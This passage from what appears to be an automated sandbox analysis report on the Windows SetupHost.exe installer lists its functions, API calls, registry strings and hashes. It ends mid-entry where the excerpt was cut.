                                                                                                                        • Opcode Fuzzy Hash: 2125b1f8dc0190f551761461ca41e0ddb4c8758f3cbbc29594d6976ae439211f
                                                                                                                        • Instruction Fuzzy Hash: A5010871A0030DABDB10DFA5DC999AEBBF8FB48341F500869A502E6191DA70DA049A20
                                                                                                                        Function 004FB149 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
                                                                                                                          • Part of subcall function 004FD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
                                                                                                                          • Part of subcall function 004FD0B5: GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
                                                                                                                          • Part of subcall function 004FD0B5: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
                                                                                                                        • RegSetValueExW.KERNEL32(?,CorrelationVector,00000000,00000001,?,00000000,00000002,?,?,00000000,?,?,?,?,?), ref: 004FB191
                                                                                                                        • RegCloseKey.ADVAPI32(?,00000002,?,?,00000000,?,?,?,?,?), ref: 004FB1C6
                                                                                                                          • Part of subcall function 004F9D9C: EtwEventEnabled.NTDLL(?,?,004FBC0D), ref: 004F9E13
                                                                                                                          • Part of subcall function 004F9D9C: EtwEventWrite.NTDLL(?,?,004FBC0D,{6c104913-738b-4411-a4ec-8b594e314f6b},00000000), ref: 004F9E3B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventProcess$CurrentEnabledErrorLastValueWow64Write
                                                                                                                        • String ID: CorrelationVector$SYSTEM\Setup\MoSetup
                                                                                                                        • API String ID: 414203747-2351024219
                                                                                                                        • Opcode ID: 3413c884797ea384b147a652fbabe7b452dcd66f42972120d003d1dde1526ef9
                                                                                                                        • Instruction ID: bd60de611b46853884f4b4373475e717e3f9650e0a9efa27fd240b2509f9fffd
                                                                                                                        • Opcode Fuzzy Hash: 3413c884797ea384b147a652fbabe7b452dcd66f42972120d003d1dde1526ef9
                                                                                                                        • Instruction Fuzzy Hash: B1019275A0020CBBDF01AFA1D996ABE7B76EFC0348F20406EE601A6251DB799E049B54
                                                                                                                        Function 004FCBD8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004FCC17
                                                                                                                        • CMoSetupOneSettingsHelperT<class CEmptyType>::GetBuildLabEx, xrefs: 004FCC05, 004FCC37
                                                                                                                        • BuildLabEx, xrefs: 004FCC1D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID: BuildLabEx$CMoSetupOneSettingsHelperT<class CEmptyType>::GetBuildLabEx$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                        • API String ID: 431132790-2994999946
                                                                                                                        • Opcode ID: cc5916648612a7aa233985e00755113cdfd8cc60c240940ca5e467a1a1845d22
                                                                                                                        • Instruction ID: e835ccff3241c400466f2a3b8d5820915618418416ea4327cf9eef090d270f59
                                                                                                                        • Opcode Fuzzy Hash: cc5916648612a7aa233985e00755113cdfd8cc60c240940ca5e467a1a1845d22
                                                                                                                        • Instruction Fuzzy Hash: 4101B174B4022D878B05EF54CE81E7F7662BBD4B04B21402FEA04AF385CF788C018799
                                                                                                                        Function 0053E60A Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0053E611
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000002,00000000,?,0000003C,0053E6FC,?,?,00000000,?,00000000), ref: 0053E629
                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,?,?,?,?,scenarioId,?), ref: 0053E633
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0053E6C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFreeH_prolog3HandleLastLibraryModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4191248489-0
                                                                                                                        • Opcode ID: dfb730ef4b3dbba37c5c0bfe44c5c6aea2d90fcfaf859369ded3d74444f05a6c
                                                                                                                        • Instruction ID: fec51f0a6da06f85635217976291df55293c432134a168c4bf09a7923886504b
                                                                                                                        • Opcode Fuzzy Hash: dfb730ef4b3dbba37c5c0bfe44c5c6aea2d90fcfaf859369ded3d74444f05a6c
                                                                                                                        • Instruction Fuzzy Hash: C421AC70A0121A8BDF18EFB5D8276BE7BB1BFA4301F14052DA446EB2D1DB309D008B40
                                                                                                                        Function 0053E6D5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0053E60A: __EH_prolog3.LIBCMT ref: 0053E611
                                                                                                                          • Part of subcall function 0053E60A: GetModuleHandleExW.KERNEL32(00000002,00000000,?,0000003C,0053E6FC,?,?,00000000,?,00000000), ref: 0053E629
                                                                                                                          • Part of subcall function 0053E60A: GetLastError.KERNEL32(00000000,?,?,?,?,?,?,scenarioId,?), ref: 0053E633
                                                                                                                          • Part of subcall function 0053E60A: FreeLibrary.KERNEL32(00000000), ref: 0053E6C1
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,?,?,?,?,?,?,scenarioId,?), ref: 0053E730
                                                                                                                        Strings
                                                                                                                        • base\ntsetup\conx\common\setuplib\src\osinfo.cpp, xrefs: 0053E73F
                                                                                                                        • Target OS version: %u.%u.%u.%u, xrefs: 0053E756
                                                                                                                        • ConX::Setup::Common::COSInfoHelper::GetTargetOSVersion, xrefs: 0053E73A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FreeH_prolog3HandleLibraryModule
                                                                                                                        • String ID: ConX::Setup::Common::COSInfoHelper::GetTargetOSVersion$Target OS version: %u.%u.%u.%u$base\ntsetup\conx\common\setuplib\src\osinfo.cpp
                                                                                                                        • API String ID: 4039679901-1364077200
                                                                                                                        • Opcode ID: 5580c704e5a932d566103dd51f73eff942747e1206dfd210854c514f51f84b2a
                                                                                                                        • Instruction ID: fb459b3ac35e1ae45415ba7c4e61d4e9d51afcc64d938d4f94b4be52ed687adc
                                                                                                                        • Opcode Fuzzy Hash: 5580c704e5a932d566103dd51f73eff942747e1206dfd210854c514f51f84b2a
                                                                                                                        • Instruction Fuzzy Hash: 2911AFB2604602AB8701DF69D886D6AFBE8FB98300B10461AF518C3250E770E914CBD2
                                                                                                                        Function 0054540D Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000002), ref: 00545433
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000002), ref: 00545459
                                                                                                                        • SetLastError.KERNEL32(00000001,?,?,?,00000000,00000000,00000002), ref: 00545466
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: `#T
                                                                                                                        • API String ID: 1452528299-1698295998
                                                                                                                        • Opcode ID: bf8d4377487964e21a8083fc8ca4aadabc4e7d220d33ca2e195937abf7203487
                                                                                                                        • Instruction ID: 1c30fe251febcfe2399494cb1cfeb21c2dd582152850eab032ca4d4070312fed
                                                                                                                        • Opcode Fuzzy Hash: bf8d4377487964e21a8083fc8ca4aadabc4e7d220d33ca2e195937abf7203487
                                                                                                                        • Instruction Fuzzy Hash: 21F0F631604B14ABDF141774FC1DB9E3F68FB6872BF200520F512DB1E1EAA19C45EA94
                                                                                                                        Function 0053E865 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0053E8E5: __EH_prolog3.LIBCMT ref: 0053E8EC
                                                                                                                          • Part of subcall function 0053E8E5: GetFileVersionInfoSizeExW.KERNELBASE(00000000,00000000,?,00000014,0053E880,?,?), ref: 0053E914
                                                                                                                          • Part of subcall function 0053E8E5: GetLastError.KERNEL32 ref: 0053E921
                                                                                                                        • VerQueryValueW.VERSION(00000000,004C44A4,?,kS,?,?,?,?,?,?,0053E66B), ref: 0053E89F
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,0053E66B), ref: 0053E8A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FileH_prolog3InfoQuerySizeValueVersion
                                                                                                                        • String ID: kS
                                                                                                                        • API String ID: 3811068625-3419900345
                                                                                                                        • Opcode ID: 20eac378a060acd4b35150ee1a32bfa75e423ba371b4e0dd8f54a7b8ec5aab50
                                                                                                                        • Instruction ID: c2d0c30775c45b2e8c92767f3e18ab7f0ee616df16025b91e83da356829fe273
                                                                                                                        • Opcode Fuzzy Hash: 20eac378a060acd4b35150ee1a32bfa75e423ba371b4e0dd8f54a7b8ec5aab50
                                                                                                                        • Instruction Fuzzy Hash: 34018835F0020CA7DF15BBB5DC46AAEBBB9BB84315F20447AB502A7181DA749E08A654
                                                                                                                        Function 004FB369 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
                                                                                                                          • Part of subcall function 004FD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
                                                                                                                          • Part of subcall function 004FD0B5: GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
                                                                                                                          • Part of subcall function 004FD0B5: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
                                                                                                                        • RegSetValueExW.KERNEL32(00000000,?,00000000,00000004,?,?,00000002,00000000,SYSTEM\Setup\MoSetup\Volatile), ref: 004FB3AB
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000002,00000000,SYSTEM\Setup\MoSetup\Volatile), ref: 004FB3E0
                                                                                                                          • Part of subcall function 004F9D9C: EtwEventEnabled.NTDLL(?,?,004FBC0D), ref: 004F9E13
                                                                                                                          • Part of subcall function 004F9D9C: EtwEventWrite.NTDLL(?,?,004FBC0D,{6c104913-738b-4411-a4ec-8b594e314f6b},00000000), ref: 004F9E3B
                                                                                                                        Strings
                                                                                                                        • SYSTEM\Setup\MoSetup\Volatile, xrefs: 004FB372
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventProcess$CurrentEnabledErrorLastValueWow64Write
                                                                                                                        • String ID: SYSTEM\Setup\MoSetup\Volatile
                                                                                                                        • API String ID: 414203747-1711884389
                                                                                                                        • Opcode ID: 149001819008f4d44cedc43fd601e276fd5176a60c6a3305f9ceffc762215e11
                                                                                                                        • Instruction ID: 0d488056702f0d1f1ad5baa5fee5e4b42fd4a64a70b6529214fc8ec2ddf6f34c
                                                                                                                        • Opcode Fuzzy Hash: 149001819008f4d44cedc43fd601e276fd5176a60c6a3305f9ceffc762215e11
                                                                                                                        • Instruction Fuzzy Hash: ED015271A0020DFBDF01AFA1DC85ABEBB76EF80358F20406FEA0597251DB799E059B54
                                                                                                                        Function 004FC6D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?,00000000,80000002,80000002,?,004FB5A2,?,00000000,?), ref: 004FC6F0
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,004FB5A2,?,00000000,?), ref: 004FC72B
                                                                                                                        Strings
                                                                                                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004FC6E4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpen
                                                                                                                        • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                        • API String ID: 47109696-2278330950
                                                                                                                        • Opcode ID: bcded1e7e9dbd1f2aed6e1d73362f99a8340820efd819085a0a4f0c7c5c798a2
                                                                                                                        • Instruction ID: c83e4ca11df94dde200b7f5485943fd95aa6bf421903d2ffecbeb0b0f99dfbc2
                                                                                                                        • Opcode Fuzzy Hash: bcded1e7e9dbd1f2aed6e1d73362f99a8340820efd819085a0a4f0c7c5c798a2
                                                                                                                        • Instruction Fuzzy Hash: C101697091021CFBCF14EB91D989AAEBBB9EF98314F20405AB801A7250D7789F01DB54
                                                                                                                        Function 00549436 Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0054A1E5: RegGetValueW.KERNEL32(80000002,?,ETag,00000002,00000000,00000000,00000000,?,?,?,00000001,00000000,00000000), ref: 0054A260
                                                                                                                          • Part of subcall function 0054A1E5: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0054A30E
                                                                                                                          • Part of subcall function 0054A1E5: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0054A315
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000001,00000000,00000000,00000001,00000001,?,005494E2,00000001,00000000,00000001,00000000,00000000), ref: 00549486
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,005494E2,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0054948D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000001,?,005494E2,00000001,00000000,00000001,00000000,00000000), ref: 005494B0
                                                                                                                        • HeapFree.KERNEL32(00000000,?,005494E2,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000,00000000), ref: 005494B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Free$AllocValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2792325425-0
                                                                                                                        • Opcode ID: e26400a31d5eddbb87a697a8694da68ae42eca9d2c8a770a6e92509584ec2c65
                                                                                                                        • Instruction ID: d1a3b765800a67ba130222cbfdc243146273c135f7e77e6294c5d99900c5f3e1
                                                                                                                        • Opcode Fuzzy Hash: e26400a31d5eddbb87a697a8694da68ae42eca9d2c8a770a6e92509584ec2c65
                                                                                                                        • Instruction Fuzzy Hash: F111C676700308ABCB109FA5D889AAF7FADFB88B19F10415DB80697250DB749D05D760
                                                                                                                        Function 00542F1B Relevance: 4.6, APIs: 3, Instructions: 106memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00542E53: __EH_prolog3.LIBCMT ref: 00542E5A
                                                                                                                          • Part of subcall function 00542E53: memset.MSVCRT ref: 00542EDA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00002420,?,?,00000000), ref: 00542F90
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,00000000), ref: 00542F97
                                                                                                                        • memset.MSVCRT ref: 00542FB5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heapmemset$AllocateH_prolog3Process
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 666435912-0
                                                                                                                        • Opcode ID: 7b8f5037abc09228b94928db7bc3219f82a6aa61e689c02102f43225134e5f41
                                                                                                                        • Instruction ID: 5b453cae093e3b234edd88936602354e506df0985bec149826615188fb2351bf
                                                                                                                        • Opcode Fuzzy Hash: 7b8f5037abc09228b94928db7bc3219f82a6aa61e689c02102f43225134e5f41
                                                                                                                        • Instruction Fuzzy Hash: F9418470A003059FDB18DF69D848AEEBFF5FF98304F14426AE80997296D734CA51CB64
                                                                                                                        Function 004FB01B Relevance: 4.6, APIs: 3, Instructions: 64COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,?,?,004F8959,00000000,0000000C,004ECD31,00000000), ref: 004FB09C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3664257935-0
                                                                                                                        • Opcode ID: 49567e59ab5f2a7994c0db3d78649a92d914e56891bfa35d4e68c66e429469ac
                                                                                                                        • Instruction ID: c9ee77704e29dcdb7c1b5e9e0f224cecf1de6ed324e9c7454aaf2497cd7dcb51
                                                                                                                        • Opcode Fuzzy Hash: 49567e59ab5f2a7994c0db3d78649a92d914e56891bfa35d4e68c66e429469ac
                                                                                                                        • Instruction Fuzzy Hash: 9411CE3170030C9FCB25AAB6C894B3F76A9DBC5744B20002FAB259B341EF799D059698
                                                                                                                        Function 004FB2C2 Relevance: 4.6, APIs: 3, Instructions: 61registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FD14E: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000), ref: 004FD18D
                                                                                                                          • Part of subcall function 004FD14E: IsWow64Process.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 004FD194
                                                                                                                          • Part of subcall function 004FD14E: GetLastError.KERNEL32(?,?,00000000,00000000,?,00000000), ref: 004FD19E
                                                                                                                          • Part of subcall function 004FD14E: RegCloseKey.ADVAPI32(00000000,?,?,00000000), ref: 004FD210
                                                                                                                        • RegSetKeySecurity.ADVAPI32(00000000,00000004,00000000,?,?,00000000,00000000,?,00000000), ref: 004FB31D
                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 004FB34D
                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 004FB35C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseProcess$CurrentErrorFreeLastLocalSecurityWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3952319208-0
                                                                                                                        • Opcode ID: 033241421a6bd9d81dbb686b4c37c82f828b19feb53dcfc603e5b56d09d45ded
                                                                                                                        • Instruction ID: 4cef91031e7f99488a9ed450cc9ffbe62eb8a733a5a1981e01d1662ac8672a32
                                                                                                                        • Opcode Fuzzy Hash: 033241421a6bd9d81dbb686b4c37c82f828b19feb53dcfc603e5b56d09d45ded
                                                                                                                        • Instruction Fuzzy Hash: 1F11CB31A4420CEBDF119B99CC0DBBFB7B6EBC1305F24405AE60162290D7784E06DB55
                                                                                                                        Function 00542E53 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 747782440-0
                                                                                                                        • Opcode ID: 9ce635fc9e69a2769a1f77cc119cba4d3e6cc6e8af025d5c7f08e5beb520e809
                                                                                                                        • Instruction ID: 10ae341b8310d80c4a523f33b4ceb443bac0e294b8627c6bf8d418d8f8934406
